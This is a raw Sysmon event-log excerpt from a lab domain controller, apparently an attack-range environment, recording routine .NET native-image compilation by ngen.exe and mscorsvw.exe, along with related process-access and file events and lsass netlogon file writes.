21:01:14.685{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11A-60D3-7A02-00000000CF01}2236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.623{4DB9351A-A11A-60D3-7902-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LKIJ6N3X9W\System.Management.Instrumentation.ni.dll.auxMD5=3D5CBC515E35F8F7E363B002528517F0,SHA256=8FD1AFA9C6E8813BC31FA5AB1ADBF5476FABDA3CABC4FC88CDAF4C51C2B378A5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.623{4DB9351A-A11A-60D3-7902-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LKIJ6N3X9W\System.Management.Instrumentation.ni.dllMD5=5EB656CE52B16A317C7CF53B3B6E2131,SHA256=51EC98739C5B189FF84F3358A09D1D002B956FCCEBEE7F8CB35EFB7C011C4A5C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:14.607{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\da4-0\System.Management.Instrumentation.dll2021-06-23 21:01:14.607 10341000x800000000000000018864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.389{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:14.373{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.373{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:14.310{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11A-60D3-7802-00000000CF01}5140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.295{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11A-60D3-7802-00000000CF01}5140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:14.295{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11A-60D3-7802-00000000CF01}5140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.904{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.904{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.904{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.857{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-8002-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000018901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.842{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-8002-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.842{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-8002-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-A11B-60D3-7F02-00000000CF01}3656NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7ENBCLX6YT\System.Net.Http.WebRequest.ni.dll.auxMD5=504853C28422844FC7509FFA96E52CA9,SHA256=53815D7F51C00EF70A7ABAE2D25FDF7062426642C18C095E713F5D16D98AF5D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-A11B-60D3-7F02-00000000CF01}3656NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7ENBCLX6YT\System.Net.Http.WebRequest.ni.dllMD5=1E63037F7416695E734762C5DBBE6929,SHA256=CA07D8FC2F9834B56770B119201E35AB97A97D2178C16EC81A60CD4CF4B41011,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000018897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=861E2074A54ACE92E0D7764F2EBC2E68,SHA256=AF5176FA16B0F48B5D355A1B7C9F0933E8B98C089F1CFCCCAA9D2735DEE3D866,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000018896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:15.795{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e48-0\System.Net.Http.WebRequest.dll2021-06-23 21:01:15.795 23542300x800000000000000018895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628NT 
AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=595F47A7B05E23A5F6060F0F4BB3716E,SHA256=1C755D4845DC45A3D77C8F8E47353B2700174C9BFB57B883899FC274744AD2A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.764{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3474C857098CA46AA1D5BA7C2C26D8F8,SHA256=14139E67F4AC703AF97B2558CC44B25FA5FFD21A953B4947BDF5136EE4130A7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.748{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.701{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7E02-00000000CF01}1080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.685{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7E02-00000000CF01}1080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:15.685{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7E02-00000000CF01}1080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.623{4DB9351A-A11B-60D3-7D02-00000000CF01}2536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85LYOGT8IU\System.Net.ni.dll.auxMD5=9B0174DFB6E63E3BA23B1440E9E50A4E,SHA256=38BDBF0ADC5D46FBA26989747CB3C97FB0278961D993131D4F88288075B80A4F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.623{4DB9351A-A11B-60D3-7D02-00000000CF01}2536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85LYOGT8IU\System.Net.ni.dllMD5=26CD332634E040FA786C5691506B4366,SHA256=A61744EAB77DC7829352DA5318C8EB1B3B51159F43AE56806226006CBF72DE19,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:15.607{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9e8-0\System.Net.dll2021-06-23 21:01:15.607 10341000x800000000000000018884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 